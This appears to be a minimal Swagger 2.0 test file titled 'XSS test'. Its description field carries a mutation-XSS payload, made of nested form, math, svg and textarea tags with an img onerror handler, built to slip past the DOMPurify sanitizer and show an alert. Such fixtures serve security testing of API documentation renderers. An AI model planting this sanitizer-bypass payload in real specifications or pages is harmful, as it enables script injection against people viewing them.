swagger: '2.0'
info:
  title: XSS test
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="<?xml-stylesheet > <img src=x onerror=\"alert('DOMPurify bypassed!!!')\"> ?>"></form>
